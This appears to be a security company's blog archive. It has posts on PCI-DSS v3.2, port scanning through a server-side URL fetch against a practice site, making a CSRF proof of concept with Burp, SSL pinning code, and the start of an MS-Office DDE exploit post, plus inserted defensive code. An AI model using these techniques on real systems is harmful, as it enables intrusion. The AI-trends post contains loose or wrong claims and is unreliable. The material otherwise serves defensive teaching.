Showing posts with label Data Security. Show all posts

Wednesday, 16 May 2018

INTRODUCTION & CHANGES IN PCI-DSS v3.2




The Payment Card Industry Data Security Standard (PCI-DSS) was developed to set out the policy and standards for cardholder data security so that data security measures are consistent globally. PCI-DSS defines a minimum set of technical and operational requirements to protect cardholder data, and it applies to every operation involved in the processing of cardholder data for payment cards.
The following sections describe the changes in PCI-DSS v3.2 from version 3.1.

AREAS EMPHASISED IN V3.2:

  • CHANGE MANAGEMENT PROCESS:

    • The change management process is followed so that changes driven by business requirements are made securely.
  • ADMINISTRATIVE ACCESS:

    • Administrative privilege is given only to the single user who needs it; that user can gain read, write and execute access to make changes in the environment.
  • INCIDENT RESPONSE:

    • Incident response means that when an issue is raised in the environment, action is taken according to the severity of the problem.
  • E-COMMERCE – A-EP ENVIRONMENTS:

    • The "Expected Testing" column is based on the testing procedures in the PCI DSS and gives a high-level description of the types of testing activities that should be performed to verify that a requirement has been met.

SAQ VERSION    # QUESTIONS V3.1    # QUESTIONS V3.2    DIFFERENCE

SAQ D-SP       347                 369                 +22
SAQ D-MER      326                 331                 +5
SAQ C          139                 162                 +23
SAQ A-EP       139                 193                 +54
SAQ B-IP       83                  84                  +1
SAQ C-VT       73                  80                  +7
SAQ B          41                  41                  0
SAQ P2PE-HW    35                  33                  -2
SAQ A          14                  22                  +8

MASKING THE PAN NUMBER

  • DISPLAYING THE PRIMARY ACCOUNT NUMBER

    • Under the current requirement, at most the first six and last four digits of the PAN may be displayed.
For a legitimate business need the PAN must be encrypted. Refer to Requirement 3.3 for further details.

CHANGE CONTROL

  • CHANGES IN CHANGE CONTROL IN V3.2

    • Maintain proper documentation whenever a change control is issued.
    • Implement all the necessary controls on all new and existing systems or devices.
    • Change control processes must include verification of the PCI DSS requirements impacted by a (significant) change. Follow Requirement 6.4.6, which is effective from Feb 1, 2018.

HIGH-RISK VULNERABILITY MANAGEMENT

  • INTEGRATE VULNERABILITIES INTO THE RISK ASSESSMENT PROCESS

    • Ensure all "high risk" vulnerabilities found by internal scans are addressed and resolved.
    • Rank vulnerabilities as per Requirements 6.1 and 6.2 within the PCI-DSS scope.
    • After resolving the vulnerabilities, rescan to confirm that the risk has been cleared.

REMOTE ADMINISTRATOR ACCESS TO CDE

  • ANY NON-CONSOLE ADMINISTRATOR ACCESS TO CDE

    • All non-console access into the CDE by personnel with administrative access must use multi-factor authentication.
    • The existing requirement for multi-factor authentication for remote access into the CDE by personnel with administrative access still applies within the PCI-DSS scope.
    • Requirements 8.3.1 and 8.3.2 of the PCI-DSS are mandatory from Jan 31, 2018.

RESOURCE

  • Refer to the following document for the PCI-DSS scope.
  • LINK: pcisecuritystandards.org/document_library?category=pcidss

AUTHOR

Dharmesh B
Security Engineer
Briskinfosec Technology and Consulting Pvt Ltd.,
https://www.linkedin.com/in/dharmeshbaskaran/

Friday, 16 March 2018

Cross Site Port Attack (XSPA)

 


INTRODUCTION:

A web application is vulnerable to Cross Site Port Attack (XSPA) if it processes user-supplied URLs and does not sanitise the backend response received from the remote server before sending it back to the user. In specific cases the responses can be abused to determine service availability (port status, banners and so on) and even to fetch data from remote services in unexpected ways.
Detecting a potential XSPA vulnerability is simple: check whether the web app takes a URL as input, tries to connect to it, and returns the result so that the output can be analysed. I have been attempting this XSPA attack on the testing app http://testphp.vulnweb.com/
Once I visited the testing site, I selected the image categories option on the site as follows.
Then I selected the required image file, which took me to the URL below.
Once I visited this page, I started to capture the backend response using the Burp Suite tool.
Burp Suite is a graphical tool for testing web application security. It was developed to provide a comprehensive solution for web application security checks. Beyond this basic functionality it also has features such as a proxy server, scanner and intruder, and more advanced options such as a spider, a repeater, a decoder, a comparer, an extender and a sequencer.
I cross-checked this site using my localhost with some ports and captured the response in Burp Suite; by this method we can precisely analyse the response for each port.
Here I captured the response of the image URL and cross-checked it with my localhost on port 80 (HTTP), and I can see the response 200 OK (normal response).
Once it fetches the normal result, you can confirm this for other ports like 22 (SSH), 21 (FTP), 25 (SMTP), 8080 (HTTPS) etc., and you can check the result in the browser as well.

During port analysis, if the requested port is closed, the result is as follows:
It also returns a 200 response, but the body shows a warning such as "failed to open" or "connection refused"; if you see these errors you can confirm that the port is closed.
The screenshot above shows the case where the port is open: the result is returned without exposing the attacker's IP in the target's server logs, and it also reveals the backend service running on SSH.

MITIGATION FOR XSPA ATTACK:

  • Restrict access to unauthorized URLs.
  • Restrict connectivity to internal ports.
  • Whitelist IP addresses.
  • Disable unwanted protocols and services.
  • You can block your ports using a firewall for better security; please check the link below to block your internal ports.
Reference Link:
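To show what "restrict connectivity to internal ports" and "whitelist IP addresses" look like in code, here is an added example (not from the original post) of a server-side check for user-supplied URLs: it allows only http/https, only ports 80 and 443, and refuses any target that resolves to a loopback, private or link-local address, so the application can no longer be used to probe localhost or the internal network as described above. The allowed schemes and ports, the sample DNS table and the hostnames in it are constructed assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Policy values (constructed assumptions, not from the post).
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

# Constructed DNS table so the check can run offline; a real deployment
# uses resolve_all() below.
SAMPLE_DNS = {
    "www.example.com": ["93.184.216.34"],
    "internal.example": ["10.0.0.5"],                 # RFC 1918 host
    "dual.example": ["93.184.216.34", "127.0.0.1"],   # one public, one loopback record
}


def sample_resolver(host):
    """Offline stand-in for DNS (constructed)."""
    if host not in SAMPLE_DNS:
        raise socket.gaierror(f"constructed resolver: unknown host {host}")
    return SAMPLE_DNS[host]


def resolve_all(host):
    """Resolve a hostname to every A/AAAA address using the system resolver."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def _is_public_address(addr):
    """True only for globally routable unicast addresses.

    ip.is_global is False for loopback, RFC 1918 private, link-local,
    unspecified (0.0.0.0 / ::), shared (100.64/10) and reserved ranges.
    """
    ip = ipaddress.ip_address(addr)
    return ip.is_global and not ip.is_multicast


def check_fetch_target(url, resolver=resolve_all):
    """Decide whether the server may fetch a user-supplied URL.

    Returns (allowed, reason). The caller must connect to the address that
    was validated here (not re-resolve the name), otherwise a DNS answer that
    changes between check and fetch (rebinding) reopens the hole.
    """
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if parts.username or parts.password:
        return False, "credentials in URL are not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port not allowed: {port}"
    # A literal IP is checked directly; a hostname is resolved and EVERY
    # returned address must be public, so a name that also carries a
    # 127.0.0.1 or 10.0.0.0/8 record is rejected too.
    try:
        addresses = [host] if _is_ip_literal(host) else resolver(host)
    except OSError as exc:
        return False, f"resolution failed: {exc}"
    if not addresses:
        return False, "host did not resolve"
    for addr in addresses:
        try:
            if not _is_public_address(addr):
                return False, f"non-public address: {addr}"
        except ValueError:
            return False, f"invalid address: {addr}"
    return True, f"ok: {host}:{port} -> {', '.join(addresses)}"
```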

CONCLUSION:

An XSPA attack is mainly used to perform port scanning of a target through another vulnerable website; an attacker can also use it for DoS, code execution and other major attacks on other vulnerable websites.
Reference Link:

AUTHOR

RamKumar G
Security Engineer
BriskInfoSec Technology and Consulting PVT LTD
Find me @ https://www.linkedin.com/in/ram-kumar-3439b511a/

Wednesday, 10 January 2018

How serious is Cross-site request forgery (XSRF or CSRF)?





Cross-site request forgery attacks a website as a legitimate, trusted user by tricking the victim into submitting a malicious request. An attacker may even forge a request that logs the victim into a target website (login CSRF), which can lead to further damage.
The attacker often takes advantage of the fact that the user is already authenticated, though this differs with some types of the attack. The impact of a successful CSRF exploit varies greatly with the privileges of the victim: when targeting a normal user, a successful attack can compromise end-user data and the functions available to them. Using social engineering, an attacker can embed malicious HTML or JavaScript code into an email or website that requests a specific 'task URL'. The task then executes with or without the user's knowledge, either directly or via a Cross-Site Scripting flaw. It is imperative that no XSS vulnerabilities are present, so that CSRF defenses cannot be circumvented.
As a webmaster, however, you should not assume that you are protected from CSRF attacks just because you see anti-CSRF tokens used in your web application.

BURP SUITE:

Burp Suite is an integrated platform for performing security testing of web applications; testers use Burp to test the security of their applications. Some of Burp's more advanced features take further learning and experience to master. It is not a point-and-click tool but is designed to be used by hands-on testers to support the testing process.
It was developed to provide a comprehensive solution for web application security checks. In addition to basic functionality such as a proxy server, scanner and intruder, the tool also contains more advanced options such as a spider, a repeater, a decoder, a comparer, an extender and a sequencer. A penetration tester configures their browser to route traffic through the proxy, which then acts as a sort of man in the middle by capturing and analyzing each request and response to and from the target web application.
Step 1: To test CSRF manually, configure Burp Suite with your browser.
Step 2: Take an authenticated web application (the testing site). You can log in using the credentials test:test.
Step 3: Find a form whose values you can change, for example name, email ID or phone number. Open Burp Proxy, open the Intercept tab and turn Intercept on.
Step 4: Update the field and submit the request so that it is captured in Burp Proxy (Raw view).
Step 5: Right-click the captured request, go to Engagement tools and choose the Generate CSRF PoC option.
Step 6: Once the PoC is generated, copy the HTML, open Notepad and paste the HTML.

Step 7: Modify the data, e.g. username "Test" and email ID abc@gmail.com.
Step 8: Save it as test.html. In another browser, log in to the test site as the test user, then open test.html and submit the request.

Step 9: The attack succeeded: the account information has been changed. This serves as an initial check to verify whether the attack is possible; a successful attack shows that the web application is vulnerable to CSRF.
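The following is an added example (not part of the original post) of the server-side checks that make a generated PoC like the one above fail: a per-session synchronizer token compared in constant time, plus an Origin/Referer check, applied to the kind of profile-update request used in the steps. A token that is merely present on the form but not bound to the session or not verified is exactly the false sense of safety the introduction warns about. The secret, the allowed origin and the request dictionaries are constructed assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed assumptions: a server-side key and the origin(s) the app serves.
SERVER_SECRET = b"constructed-secret-replace-in-production"
ALLOWED_ORIGINS = {"https://app.example.com"}
STATE_CHANGING_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


def _mac(session_id, nonce):
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id):
    """Synchronizer token: random nonce plus an HMAC binding it to the session.

    Embed it in the form as a hidden field; it is useless on another session,
    so a PoC page cannot obtain a usable value for the victim.
    """
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def token_is_valid(session_id, token):
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    # Constant-time comparison: a plain == would leak the MAC byte by byte.
    return hmac.compare_digest(mac, _mac(session_id, nonce))


def origin_is_allowed(headers):
    """Browsers send Origin on cross-site form POSTs; fall back to Referer.

    A request carrying neither header is rejected rather than trusted.
    """
    h = {k.lower(): v for k, v in headers.items()}
    origin = h.get("origin")
    if origin is None:
        referer = h.get("referer")
        if not referer:
            return False
        p = urlsplit(referer)
        origin = f"{p.scheme}://{p.netloc}"
    return origin in ALLOWED_ORIGINS


def accept_state_change(method, session_id, form, headers):
    """Gate a state-changing request such as the profile-update form above.

    Returns (accepted, reason).
    """
    if method.upper() not in STATE_CHANGING_METHODS:
        return False, "state changes must use POST/PUT/PATCH/DELETE, not GET"
    if not origin_is_allowed(headers):
        return False, "request origin not allowed"
    if not token_is_valid(session_id, form.get("csrf_token")):
        return False, "missing or invalid CSRF token"
    return True, "ok"
```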
Cross-site request forgery is an understated attack technique that can be exceedingly damaging; in some cases it can lead to the complete compromise of a web-based system. We at BriskInfosec take care of complete web application security testing, helping developers build their websites and applications in a secure manner.
For further information please feel free to get in touch with us @ Contact@briskinfosec.com

AUTHOR

Surya
Security Engineer
BriskInfosec Technology and consulting PVT LTD

Thursday, 4 January 2018

TOP ARTIFICIAL INTELLIGENCE TRENDS IN CYBER SECURITY



Artificial intelligence is defined as the study of intelligent agents: devices that perceive the environment around them and take actions that improve their chance of success at some goal. It plays an important role in all fields. AI robots are one of the major inventions of recent years: they observe the actions, control and activities of the human environment and replicate them. AI can encompass anything from Google's search algorithm upwards.
Today's artificial intelligence is made to perform a narrow task, for instance driving a car on its own. Going beyond narrow AI, many researchers plan to create a general AI (AGI or strong AI) that can perform each and every task of a human; this may also lead to some dangerous activities, which is the major drawback of moving past narrow AI.

ADVANTAGES OF ARTIFICIAL INTELLIGENCE:

Artificial intelligence is a complicated mixture of computer science, mathematics and other complex sciences. The major advantages of artificial intelligence are as follows:
  • Error Reduction
  • Difficult Exploration
  • Daily Application
  • Digital Assistance
  • Repetitive jobs
  • Medical Application
  • No Break

ERROR REDUCTION:

AI is mainly used to detect and minimise errors and to produce results with higher accuracy. It also helps us study the concepts involved in space exploration: AI-created robots are used to transfer information across space, and the information these robots transfer is highly secured, so it cannot be modified or copied by an ordinary human.

DIFFICULT EXPLORATION:

It involves the science of robots, the process of mining and other fuel exploration purposes. It is used not only for complex behaviour but also in space exploration, since thanks to its programming it can carry out processes beyond human ability.
In mining, AI plays an important role in detecting the exact place to dig to find natural resources like coal, gold and silver; research by Goldcorp in a team-up with IBM Watson has developed an advanced AI feature to find the locations of natural resources.
Reference Link: https://www.techemergence.com/ai-in-mining-mineral-exploration-autonomous-drills/

DAILY APPLICATION:

Computed methods for automated testing, learning, reasoning and our other daily activities fall under AI. Cortana and Siri are used as virtual search engines to help us out; tracking software like maps and cab booking works on GPS. Smartphones are the perfect example of artificial intelligence, and the security chips placed in ATM cards follow AI to secure themselves from fraud.

DIGITAL ASSISTANCE:

Highly advanced organizations use an 'avatar' to minimise human work: it interacts with clients and performs tasks based on their requirements. Many people have started to use robots in hotels for serving, and Google Lens is another advanced method to connect with the internet without an authentication process.

REPETITIVE JOBS:

Repetitive jobs are monotonous in nature and can be handed to machine intelligence, since a machine thinks faster than a human. Machine intelligence can be assigned dangerous tasks because we can set parameters for robots to perform their actions; it processes the work in a secured manner and produces better results than humans. The PlayStation is one of the best examples: when we are playing, one component is the user and the other is the AI, which captures the movement of the user and displays the same actions on the screen.

MEDICAL APPLICATION:

In the medical field, doctors assess patients and their health risks using artificial intelligence, which also guides patients to be aware of medicine side effects. It finds huge application in detecting neurological disorders, as it captures the actions performed by the brain; nowadays medical applications have developed to digital body scanning (scanning over your whole body) in an automated manner.
Reference Link: https://www.youtube.com/watch?v=DCtAxUB1bvI

NO BREAK:

Machines, unlike humans, do not require frequent breaks and refreshments; they perform for long hours and can continue without getting bored, distracted or even tired.

DISADVANTAGES OF ARTIFICIAL INTELLIGENCE

  • High Cost
  • No Replicating humans
  • No improvement with experience
  • Unemployment

HIGH COST:

Creating artificial intelligence machines or robots costs more than other automated machines, and their repair and maintenance are expensive too. AI also needs upgrades to develop its level day by day, and when an AI machine breaks down, recovering the code or repairing the machine costs a lot, so this is considered the major drawback of artificial intelligence.

NO REPLICATING HUMANS:

Machines do not have emotions, which is a drawback of AI, because in certain situations they do not know how to take the correct decision at a specific time. They either perform incorrectly or break down in such situations.

NO IMPROVEMENT WITH EXPERIENCE:

Unlike humans, artificial intelligence cannot build up experience over time. AI stores lots of data but fails to access it when it is needed, and it does not have care or emotional feeling like a human, which is one of its drawbacks relative to humans: it fails to distinguish between a hardworking individual and an inefficient one.

UNEMPLOYMENT:

Replacing humans with machines leads to large-scale unemployment, which is one of the most socially undesirable phenomena. Humans are becoming lazy nowadays and have started to use machines to complete their work, which leads to unemployment for many people. If humans start thinking in a destructive way they can create havoc with these machines; when artificial intelligence is used destructively it can lead to massive destruction in the world.

ROLE OF AI IN CYBER SECURITY:

Machine learning and artificial intelligence play an important role across industries and applications, and have been used for computing power, data collection and analysis against vulnerabilities, etc.
By using AI we can perform any kind of exploit, and it detects vulnerabilities in an easier and automated way; in many cyber security organizations, employees have started to learn AI and machine learning to develop their standards to the next level in artificial intelligence.

TOP TRENDS IN CYBER SECURITY:

GDPR (GENERAL DATA PROTECTION REGULATION):

It is prepared mainly for the European Union and sets out how to store personal data in a secured manner. It was created mainly for EU citizens, who are not yet fully covered, and many organizations are expected to start on GDPR in May.

AI AND MACHINE LEARNING ON CYBER DEFENSE:

AI and machine learning play an important role in cyber defense: machine learning modules detect the exact moves of cyber criminals, which helps InfoSec professionals greatly.

HANDLING DATA BREACHES:

It is impossible to eradicate data breaches completely, but many organizations have started to control them under certain conditions: by monitoring IoT devices to gain control over DDoS attacks, by misdirecting potential victims, and by addressing the failure to patch known vulnerabilities. We can hope that the data could be entirely controlled in the upcoming years.

DEVELOPING A COMMON LANGUAGE:

There is positive growth in the cybersecurity realm, not least the creation and adoption of things like the NIST Cybersecurity Framework, and more cybersecurity experts and organizations are planning to develop a common language in the field of cybersecurity to make the process easier.

APPLICATION TESTING:

Gaps in application testing lead to a large number of data breaches because security testing of applications is not properly maintained. To control these, everyone should put fresh effort into patching and app testing in the coming year, and by this we would see a dramatic drop in data breaches.

ARTIFICIAL INTELLIGENCE TOOLS:

  • Google Now
  • Intelligent Personal Assistants
  • Crystal knows
  • Textio
  • Enlitic
  • Digital Genius
  • TAMR
  • Intraspexion
  • Recorded Future
  • Conversica

COMPANIES TRIES TO IMPROVE AI IN CYBER SECURITY:

AI FOCUS ON MALWARE:

AI mainly focuses on malware rather than exploits. It checks every suspicious file within a folder, or checks CPU instructions or API imports, and can detect malware by certain limits on memory or I/O operations. AI's focus starts from the exploitation stage: if malware is sent to the computer it starts with exploitation, and later malicious shellcode can be delivered through the browser, Microsoft Office or Adobe Reader. Finally, in malware detection, AI examines the memory level and I/O operations, and files that do not meet its threshold are considered malicious.
After malware detection, AI can also be bypassed using AI evasion techniques; by this process the malware redirects its way around AV detection and bypasses the AI's malware detection, so with these techniques the AI fails to detect the malware. They are explained as follows.
But AI still fails to detect zero-day attacks; many methods have been developed on AI to detect advanced threats and zero-days, and although they fail so far, development on detecting advanced-level threats is in progress.

SUB INDUSTRY ARTIFICIAL INTELLIGENCE:

Artificial intelligence statistics across every industry are described in the figure above.

BOOKS ON ARTIFICIAL INTELLIGENCE:

Reference Link: http://bigdata-madesimple.com/20-free-books-to-get-started-with-artificial-intelligence/

CONCLUSION:

As cyberattacks become more sophisticated, cybersecurity teams are tasked with adapting their technology to find new anomalies. Organizations face millions of threats each day, making it impossible for a security researcher to analyze and categorize them; this task can be done efficiently using machine learning.
Moreover, a more efficient cybersecurity process can help reduce costs and streamline the process. Artificial intelligence and machine learning can rapidly and efficiently detect threats, resolve them, and prevent them in the shortest amount of time possible with the greatest potential for resolution.

AUTHOR

RamKumar
Security Engineer
BriskInfosec Technology and Consulting PVT LTD
Follow me @ https://www.linkedin.com/in/ram-kumar-3439b511a/

Saturday, 16 December 2017

MAN IN THE MIDDLE ATTACK ON MOBILE APPLICATIONS

MAN IN THE MIDDLE ATTACK ON MOBILE APPLICATION BECOMES SERIOUS THREAT

WHAT IS MAN IN THE MIDDLE ATTACK?

A man in the middle (MITM) attack is one where the attacker interposes between the sender and receiver and gathers sensitive data. MITM attacks, which are a form of session hijacking, are not new. However, what might not be known is that mobile devices are vulnerable to MITM attacks too. It is more complex for the attacker to mount a MITM attack on a mobile application than on a web application.

HOW DOES A MAN-IN-THE-MIDDLE ATTACK WORK?

A man-in-the-middle attack (MITM) is like eavesdropping. Data is sent from point A (Mobile) to point B (server/website), and an attacker can get in-between these transmissions. They then set up tools programmed to “listen in” on transmissions, intercept data that is specifically targeted as valuable, and capture the data. Sometimes this data can be modified in the process of transmission to try to trick the end user to expose sensitive information, such as login credentials. Once the user has fallen into the trap, the data is collected from the target, and the original data is then forwarded to the planned destination unaltered.

MAN IN THE MIDDLE ATTACK ON MOBILE APPLICATIONS

For mobile apps to prevent these types of attacks it is important to look at how the mobile app performs authentication. Using certificate pinning within the mobile app helps ensure that the mobile app is communicating with the device it is expecting to communicate with.

TYPES OF MITM ATTACKS

  • ARP Poisoning
  • DNS Spoofing
  • Port stealing
  • Invisible Proxy
  • Certificate Forging
In this blog, we will discuss the major mitigation for these attacks (SSL pinning).

SSL PINNING

Certificate pinning is hard-coding the certificate known to be used by the server in the mobile application. The app can then ignore the device’s trust store and rely on its own, and allow only SSL connections to hosts signed with certificates stored inside the application.
The client makes a connection to the server and the server responds with its SSL certificate. If that certificate was issued by a Certificate Authority that is trusted by the OS, then the connection is allowed.

CERTIFICATE PINNING FOR ANDROID AND IOS APPS

When we developers are working on the development of any kind of software, we can't forget about security. The minimum security measure we should use is HTTPS as the protocol to share information between a client (in this case an Android/iOS app) and a server, with an up-to-date cryptographic protocol such as TLS 1.2 (SSL 3.0 is vulnerable!).
You may think that using HTTPS is enough, but in some cases, like banking applications where sensitive data is sent between our client and our server, it could still be risky.
By default, when making a TLS connection, the client checks two things:
  • The server's certificate matches the requested hostname.
  • The server's certificate has a chain of trust back to a trusted root certificate.
What it doesn't do is check whether the certificate is the specific certificate you know your server is using, and that is a possible security vulnerability: if the client is compromised and an unsafe certificate is installed (certificate forging), someone could perform a man-in-the-middle attack.
Root CA, intermediate CA and Medium certificate
The solution to this problem is certificate pinning: storing a certificate in our client application to ensure that any SSL request made matches the server's certificate provided by a trusted CA (certificate authority). Let us see how to do it on both Android and iOS apps.

ANDROID

The OkHttp library provides a CertificatePinner class that is added to an OkHttpClient instance. The easiest way to pin a host is to turn on pinning with a broken configuration and read the expected configuration from the error when the connection fails.
import okhttp3.CertificatePinner;
import okhttp3.OkHttpClient;

// Deliberately wrong pin: the connection must fail so the exception lists the real pins.
CertificatePinner certificatePinner = new CertificatePinner.Builder()
    .add("mydomain.com", "sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=")
    .build();
OkHttpClient client = new OkHttpClient.Builder()
    .certificatePinner(certificatePinner)
    .build();
After a request is executed, you’ll see this message on the console:
javax.net.ssl.SSLPeerUnverifiedException: Certificate pinning failure!
    Peer certificate chain:
      sha256/afwiKY3RxoMmLkuRW1l7QsPZTJPwDS2pdDROQjXw8ig=: CN=mydomain.com, OU=PositiveSSL
      sha256/klO23nT2ehFDXCfx3eHTDRESMz3asj1muO+4aIdjiuY=: CN=COMODO RSA Secure Server CA
      sha256/grX4Ta9HpZx6tSHkmCrvpApTQGo67CYDnvprLg5yRME=: CN=COMODO RSA Certification Authority
      sha256/lCppFqbkrlJ3EcVFAkeip0+44VaoJUymbnOaEUk7tEU=: CN=AddTrust External CA Root
    Pinned certificates for mydomain.com:
      sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
    at okhttp3.CertificatePinner.check(CertificatePinner.java)
    at okhttp3.Connection.upgradeToTls(Connection.java)
    at okhttp3.Connection.connect(Connection.java)
    at okhttp3.Connection.connectAndSetOwner(Connection.java)
The exception lists the public key hashes of the server's certificate chain. Paste them into the CertificatePinner and you are done: once the certificate pinner is enabled in the Android app, it has protection against SSL MITM attacks.
// Pins for the leaf and each CA reported by the exception above; the handshake
// succeeds if any certificate in the presented chain matches one of these pins.
CertificatePinner certificatePinner = new CertificatePinner.Builder()
        .add("mydomain.com", "sha256/afwiKY3RxoMmLkuRW1l7QsPZTJPwDS2pdDROQjXw8ig=")
        .add("mydomain.com", "sha256/klO23nT2ehFDXCfx3eHTDRESMz3asj1muO+4aIdjiuY=")
        .add("mydomain.com", "sha256/grX4Ta9HpZx6tSHkmCrvpApTQGo67CYDnvprLg5yRME=")
        .add("mydomain.com", "sha256/lCppFqbkrlJ3EcVFAkeip0+44VaoJUymbnOaEUk7tEU=")
        .build();
OkHttpClient client = new OkHttpClient.Builder()
        .certificatePinner(certificatePinner)
        .build();
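The "sha256/..." values above are the base64-encoded SHA-256 of each certificate's DER SubjectPublicKeyInfo. The following added example (not from the original post or OkHttp) computes such a pin from a DER certificate with a minimal DER walker, so the expected pins can be produced from a certificate file such as the one fetched with the openssl command in the iOS section, instead of being read out of a deliberately failed handshake. The certificate in the block is a constructed sample with a fake key and signature; it has the X.509 structure but is not a real certificate.

```python
import base64
import hashlib


def _der(tag, payload):
    """Encode one DER TLV (used here only to build the constructed sample cert)."""
    n = len(payload)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + payload


def _read_tlv(buf, pos):
    """Decode the TLV at pos -> (tag, value_start, value_end)."""
    tag = buf[pos]
    first = buf[pos + 1]
    pos += 2
    if first & 0x80:                      # long-form length
        n = first & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    return tag, pos, pos + length


def _children(buf, start, end):
    """Yield (tag, tlv_start, value_start, value_end) for each element in a SEQUENCE."""
    pos = start
    while pos < end:
        tag, vs, ve = _read_tlv(buf, pos)
        yield tag, pos, vs, ve
        pos = ve


def extract_spki(cert_der):
    """Return the DER SubjectPublicKeyInfo (header included) of an X.509 certificate."""
    tag, vs, ve = _read_tlv(cert_der, 0)              # Certificate ::= SEQUENCE
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    tbs_tag, tbs_vs, tbs_ve = _read_tlv(cert_der, vs)  # tbsCertificate
    if tbs_tag != 0x30:
        raise ValueError("bad tbsCertificate")
    fields = list(_children(cert_der, tbs_vs, tbs_ve))
    if fields and fields[0][0] == 0xA0:               # optional version [0] EXPLICIT
        fields = fields[1:]
    # serialNumber, signature, issuer, validity, subject, subjectPublicKeyInfo, ...
    _, spki_start, _, spki_end = fields[5]
    return cert_der[spki_start:spki_end]


def pin_from_spki(spki_der):
    """OkHttp pin format: 'sha256/' + base64(SHA-256(SPKI DER))."""
    return "sha256/" + base64.b64encode(hashlib.sha256(spki_der).digest()).decode()


def pin_from_cert(cert_der):
    return pin_from_spki(extract_spki(cert_der))


def chain_matches_pins(chain_der, pinned):
    """OkHttp semantics: the handshake passes if any cert in the chain matches a pin."""
    return any(pin_from_cert(c) in pinned for c in chain_der)


# --- constructed sample certificate: real structure, fake key and signature ---
_SIG_ALG = _der(0x30, _der(0x06, b"\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b") + _der(0x05, b""))  # sha256WithRSA
_NAME = _der(0x30, _der(0x31, _der(0x30, _der(0x06, b"\x55\x04\x03") + _der(0x13, b"mydomain.com"))))  # CN
_VALIDITY = _der(0x30, _der(0x17, b"171215000000Z") + _der(0x17, b"181215000000Z"))
SAMPLE_SPKI = _der(0x30,
                   _der(0x30, _der(0x06, b"\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01") + _der(0x05, b""))  # rsaEncryption
                   + _der(0x03, b"\x00" + bytes(range(64))))  # BIT STRING with a fake 64-byte "key"
_TBS = _der(0x30, _der(0xA0, _der(0x02, b"\x02")) + _der(0x02, b"\x01") + _SIG_ALG
           + _NAME + _VALIDITY + _NAME + SAMPLE_SPKI)
SAMPLE_CERT = _der(0x30, _TBS + _SIG_ALG + _der(0x03, b"\x00" + bytes(32)))  # fake signature
```

For a real certificate, `pin_from_cert(open("mydomainCert.der", "rb").read())` yields the value to put in the `CertificatePinner`.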

IOS

The iOS solution is not so straightforward because you need to store the certificate itself inside your app. In my case, I've used Alamofire as the HTTP client library for Swift.
First, you need to get the server’s certificate in .der format and add it to your iOS project.
openssl s_client -showcerts -servername mydomain.com -connect mydomain.com:443 </dev/null | openssl x509 -outform DER > mydomainCert.der
Now let's enable certificate pinning. To do it we need both ServerTrustPolicy and SessionManager objects. The first one defines the hostname and the certificates that will be used in the process:
import Alamofire

// Pin every .der certificate bundled in the app for mydomain.com.
let serverTrustPolicies: [String: ServerTrustPolicy] = [
    "mydomain.com": .pinCertificates(
        certificates: ServerTrustPolicy.certificates(),
        validateCertificateChain: true,
        validateHost: true
    )
]
ServerTrustPolicy.certificates() will return all stored certificates and the booleans will validate the certificate chain and the hostname.
Lastly, create a SessionManager object using these trust policies:
let sessionManager = SessionManager(
    serverTrustPolicyManager: ServerTrustPolicyManager(policies: serverTrustPolicies)
)
Done! Just use this sessionManager object to execute requests:
let headers: HTTPHeaders = ["Accept": "application/json"]
sessionManager.request("https://mydomain.com/api", method: .get, headers: headers)…
CONCLUSION:
Since MITM attacks are stealthy and do not need any physical access to the victim's device, a robust protection mechanism is required to prevent them. SSL pinning is that much-needed protection: it protects the application against MITM attacks by only allowing connections to the server that present the trusted certificates.

Friday, 15 December 2017

MS-OFFICE DDE Code Execution Vulnerability


BEWARE OF MS-OFFICE DDE CODE EXECUTION VULNERABILITY


INTRODUCTION:

The DDE (Dynamic Data Exchange) protocol is an inbuilt feature of Microsoft Windows applications used for the exchange of dynamic data between applications. DDE sends messages between applications that share data and uses shared memory to exchange the data.
Many applications use the DDE feature, including MS Word, Office 365, Visual Basic, etc.

DDE VULNERABILITY AND CODE EXECUTION:

For data transfer between applications, DDE works by executing the application that will provide the data. If an attacker can inject malicious code inside the DDE object field of the application (in our example we use MS Word), the attacker can execute code from within the Word document or Excel sheet. Another advantage for the attacker is that, unlike other client-side code execution attacks that use a malicious document which prompts the victim to enable macros in order to run the malware, these DDE exploits do not need the victim to enable the macros feature in MS Word. When the malicious document is opened, it simply shows an error dialog box, which most users will dismiss by clicking 'OK'. Hence there is a higher chance for attackers to gain access to the victim machine using this vulnerability.
Since DDE is an inbuilt feature, the malicious document is not identified as a threat by anti-virus software or Windows Defender. This is another big advantage for attackers.
In this article, we will look at a demo starting with a simple code execution example using the DDE vulnerability and ending with a complete compromise of a victim system using Metasploit.

SIMPLE CODE EXECUTION IN MS-WORD:

In MS Word (all versions are vulnerable), open a blank new document, or use an existing document to lure the victim into believing the document is legitimate and trusted. For our example, I'm using a blank document.
In the blank document, go to the Insert tab → Quick Parts → Field.

Fig.1 Blank Document
